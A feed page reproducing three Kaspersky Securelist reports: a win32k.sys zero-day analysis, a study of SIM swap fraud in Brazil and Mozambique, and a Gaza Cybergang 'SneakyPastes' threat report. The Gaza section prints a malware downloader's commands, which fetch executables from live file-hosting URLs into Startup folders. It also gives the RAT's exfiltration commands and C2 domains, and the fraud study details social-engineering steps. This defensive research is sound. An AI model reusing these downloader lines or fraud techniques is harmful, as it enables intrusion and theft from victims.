Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 28 min 22 sek zpět

New zero-day vulnerability CVE-2019-0859 in win32k.sys

15 Duben, 2019 - 12:00

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019 we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft have just released a patch, part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability that is presented in the CreateWindowEx function. During execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.

In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0 and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address for the window procedure that was executed immediately after our hook. The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE. Because of that, sending of the NCCREATE message will be considered a failed operation and CreateWindowEx function will stop execution with a call to FreeWindow. Because our MENU-class window was not actually initialized, it allows us to gain control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Large-scale SIM swap fraud

11 Duben, 2019 - 12:00


SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to do be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when a carrier’s employees working in branches in small cities are sometimes unable to identify a fraudulent or adulterated document, especially branches located in kiosks or shopping malls, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch from a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

Carrier A Carrier B Carrier C Carrier D Carrier E $10 $15 $20 $25 $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoiP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMmiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

There’s also the possibility that the mobile owner has legitimately changed their SIM card, and therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow
  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.

Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim Voice and SMS must be avoided as authenticity mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7, or SS7, which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards the phone/SMS is no longer considered a secure method of authenticity if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone IMEI number (unique identifier); however, the difficult process of enrollment and maintaining changes, for example, when the user replaces the phone, deter many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.

Gaza Cybergang Group1, operation SneakyPastes

10 Duben, 2019 - 06:30

Gaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East North Africa) region, especially the Palestinian Territories.

The confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber community. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware and infection stages, although there was an alignment in its goals…

During our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in the MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups operating within Gaza Cybergang:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

The groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial infection. The three attack groups were identified sharing victims. For example, Group1 would deploy a script to infect a specific victim with malware belonging to Group2, or similarly between Group2 and Group3.

More information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:

Additional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information, please contact: intelreports@kaspersky.com


Gaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the use of paste sites (with the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT) or multiple, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection and extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

In this post, we’ll take a closer look at Gaza Cybergang Group1, including:

  1. Updated 2018/2019 tactics, techniques and procedures
  2. Victimology of the group between Jan 2018 and Jan 2019
  3. Historical checkpoints and politicized graphical decoys in Appendix I
  4. Full list of indicators of compromise in Appendix II
Technical analysis

Through our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset, which conducts widespread attacks, but is nevertheless focused on Palestinian political problems. The attackers rely a lot on chained attack stages to evade quick detection and hide the communication infrastructure.

After an analysis of the samples, and through collaboration efforts with law enforcement agencies, we were able to uncover the full cycle of the intrusions that spread across the majority of the cyber kill chain, including but not limited to the toolset used, TTPs, infrastructure, action on objectives and the victimology. These efforts have led to the takedown of a large portion of the related infrastructure.

In this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server.

We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server.


The threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in specific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used in the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in politics.

In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself.

If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards.

Intrusion life-cycle analysis

The diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different samples may use different methods to infect (i.e. invoke PowerShell, VBS, .NET app downloader, etc.), they generally stick to the same scenario of a persistent RAT that steals data and uploads it to the C2 server despite the different hard-coded domains.

Stage 1 sample file: 3amadi_hamas.zip
MD5: e686ffa90b2bfb567547f1c0dad1ae0b
Type: Compressed container
Child file/lure name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe
Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342

This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed in the table below). The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe.

Embedded functions Sleep, 15000 UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\Microsoft\Windows\Picture2.exe 6240c31d9a82dc70a38f78d44a1ee239 sleep,4000 UrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Picture4.exe cab62bb5f00fe15683c6af760c8e8f7e sleep,4000 UrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\Thr0om.jpg c90f9c600169cbedbeb23316ea61e214 sleep,4000 UrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?download_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\333Po333.exe 8c5f8d1ab7baa9a0764cd5650ddecd8e sleep,5000 UrlDownloadToFile, https://upload.cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom444444.exe 2a3aa1d207030d8c7dc3cfc9c2d9f9f1 sleep,5000 UrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?download_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom355353.exe bd83269da75741303a19b826c5f9627d sleep,5000 RunWait %AppData%\Microsoft\Windows\Picture2.exe ,, hide sleep,2000 After analyzing the files downloaded from the above first stage malware, it was clear that the threat actor wanted to achieve stable persistence on the victim machine, and also used more than one technique to exfiltrate data. The analyzed samples had a lot of similarities in terms of the code used and especially in the persistence techniques.

Malware features

All the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc. The threat actor’s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected – it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID – long MD5 string), encrypted and uploaded to the C2.

Command Brief Description KEYWORD Downloads encrypted strings found on the /Feed server page that represents specific keywords of interest which, if found, then compresses/encrypts using Winrar appending “Keyword” in the file name and uploading to the C2 using a POST command at the path “/FeedBack.php”. FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the mssql database for later reference.
KEY Trigger to upload all data gathered to the C2 using a POST command at the path “/log.php”. Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the mssql database for later reference.

KEYS Deletes the file named by tempPath + “ky” file so as not to upload anything. REUPLOAD Re-uploads recent data to the C2 server using POST at the path “/FeedBack.php”. RESTARTME Restarts the RAT application process. BLOCK Creates a file in the Temp path and names it “Block~” + PCID to kill the RAT. SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”. LAN Creates a file in the Temp path and names it “LA” + PCID to possibly spread through LAN. Note: this seems to refer to an unloaded feature/module of the RAT that is not currently in use. LANS Deletes the file created by the LAN command to reverse the effect. USB Creates a file in the Temp path and names it “us” + PCID then invokes another program module named Remo.test to identify removable drives. USBS Deletes the file created by the USB command to reverse the effect. HD Creates a file in the Temp path and names it “hd” + PCID then invokes another program module named hd.test1 to identify logical drives. HDS Deletes the file created by the HD command to reverse the effect. SHUTDOWN Shuts down the system using cmd /s /t 0 RESTART Reboots the system using cmd /r /t 0 PROCANDSOFT Lists all active processes and all installed software and uploads the results to the C2 server using a POST command at the “/log.php”. DEL-TEMP Deletes all files in the “AppData/Local/Temp” path. RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. KILL Kills system processes. Infrastructure

In 2018, the threat actor mostly relied on a single C2 server ( and rotated a multitude of domain names over a period of time. However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat.

The phishing email infrastructure though relied on disposable email providers such as bit-degree.com, mail4gmail.com, careless-whisper.com and others.


Based on the analyzed metrics, the victims were spread across 39 countries and reached 240+ unique victims. The Palestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the below table.

The most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

Country Number of victims Palestinian Territories 110 Jordan 25 Israel 17 Lebanon 11 Saudi Arabia 9 Syria 9 Egypt 7 UAE 6 Senegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain, Sri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy, Kuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA < 5 Conclusions

While Gaza Cybergang Group1 described in this post looks like a low sophistication group, with limited infrastructure and attack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high malleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.

Gaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks are now divided into three groups with different levels of sophistication and different levels of targeting. We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and procedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and Operation Parliament (Group3) will be presented in future publications.

Appendix I – Main historical checkpoints and politicized decoys Gaza Cybergang Group1 2016-2019 MD5 Hash First seen Filename/Decoy Translation/Explanation C2 server B3a472f81f800b32fe6595f44c9bf63b Feb 2016 برقية وزارة الخارجية التركية لسيادتكم حول موضوع هام.exe
Translation: Letter for you from the Turkish Ministry of Foreign Affairs on Russian military operations in Syria en.gameoolines.com ( Df3f3ad279ca98f947214ffb3c91c514
e8a29c7a6f6c0140152ca8a01e336b37 March 2016 president abu mazen meetings with khaled meshaal.lha
dw.downloadtesting.com ( f9bcc21fbb40247167c8c85ed6ef56e3 March 2016 دراسة.lha
Dl.topgamse.com ( D9dbb65a42ffe0575f0e99f7498a593e April 2016 برقية الخارجية السعودية لسيادتكم يرجي الإطلاع – مهم.exe
Translation: Saudi Foreign Affairs telegram for you, please see – important.exe en.gameoolines.com ( 221EEF8511169C0496BBC79F96E84A4A April 2016 تقرير السعودية والمعلومات المتوفر – ونستكمل عند التوفر.exe
Translation: Report on Saudi available information, to be updated with new info upon availability dw.downloadtesting.com ( 62DF4BC3738BE5AD4892200A1DC6B59A
Inside: 55d33d9da371fdfe7871f2479621444a May 2016 معلومات عن هجوم محتمل من الحوثيين على مواقع سعودية – خاص.exe
Translation: Information on possible attack by Houthis on Saudi sites – private dw.downloadtesting.com ( 838696872F924D28B08AAAA67388202E May 2016 عاجل المخابرات المصرية.exe
Translation: Urgent Egyptian Intelligence dw.downloadtesting.com ( e8be9843c372d280a506ac260567bf91 May 2016 برقية وزارة الخارجية السعودية.exe
Translation: Saudi Foreign Affairs telegram.exe
Message on the 34th GCC for Interior Ministers. Wiknet.wikaba.com (
Wiknet.mooo.com 55d33d9da371fdfe7871f2479621444a May 2016 نموذج ترشيج الدورة الخاصة .rar
Translation: Form for private training selection
Application for a certain legal training program for judges in the UAE dw.downloadtesting.com ( e782610bf209e81ecc42ca94b9388580 July 2016 عاجل – مؤتمر ايران.exe
Translation: Urgent – Iran conference dw.downloadtesting.com ( 5db18ab35d29d44dda109f49d1b99f38 June 2017 פרצת פרטיות בכרום מאפשרת לאתרים להקליט אתכם ללא ידיעתכם.exe
Translation: A privacy breach in Chrome allows sites to record you without your knowledge Wiknet.wikaba.com (
wiknet.mooo.com Dae24e4d1dfcdd98f63f7de861d95182 June 2017 مراسلات العتيبة.. وثائق ومعلومات.exe
Translation: Al Otaiba correspondence. Documents and information
Explanation: Yousef Al Otaiba is the current United Arab Emirates ambassador to the United States and Minister of State. The decoy discusses leaks that were reported in 2017 of his emails. Wiknet.wikaba.com (
wiknet.mooo.com 2358dbb85a29167fa66ee6bf1a7271cd April 2018 كتاب وزارة الخارجية الإماراتية لسيادتكم.exe
Translation: Book of the UAE MOFA for you.
